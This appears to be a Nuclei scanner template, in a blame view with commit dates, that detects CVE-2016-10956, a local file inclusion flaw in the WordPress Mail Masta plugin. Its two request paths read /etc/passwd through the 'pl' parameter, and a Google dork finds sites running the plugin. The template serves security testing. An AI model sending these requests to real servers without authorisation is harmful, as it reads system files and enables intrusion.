2021-07-14 11:03:54 +00:00
|
|
|
id: CVE-2016-10956
|
|
|
|
|
|
|
|
info:
|
2022-06-09 20:35:21 +00:00
|
|
|
name: WordPress Mail Masta 1.0 - Local File Inclusion
|
2021-07-19 12:47:12 +00:00
|
|
|
author: daffainfo,0x240x23elu
|
2021-07-14 11:03:54 +00:00
|
|
|
severity: high
|
2022-06-09 20:35:21 +00:00
|
|
|
description: WordPress Mail Masta 1.0 is susceptible to local file inclusion in count_of_send.php and csvexport.php.
|
2021-08-29 06:37:04 +00:00
|
|
|
reference:
|
2021-08-29 06:30:31 +00:00
|
|
|
- https://cxsecurity.com/issue/WLB-2016080220
|
|
|
|
- https://wpvulndb.com/vulnerabilities/8609
|
2022-05-17 09:18:12 +00:00
|
|
|
- https://wordpress.org/plugins/mail-masta/#developers
|
2022-06-09 20:35:21 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-10956
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 7.5
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2016-10956
|
|
|
|
cwe-id: CWE-20
|
2022-07-11 17:25:30 +00:00
|
|
|
metadata:
|
|
|
|
google-query: inurl:"/wp-content/plugins/mail-masta"
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: cve,cve2016,wordpress,wp-plugin,lfi,mail
|
2021-07-14 11:03:54 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
|
|
|
|
- "{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-03-22 08:01:31 +00:00
|
|
|
- "root:.*:0:0:"
|
2021-07-14 11:03:54 +00:00
|
|
|
part: body
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-02-02 17:36:24 +00:00
|
|
|
- 500
|
2022-06-09 20:35:21 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/06/09
|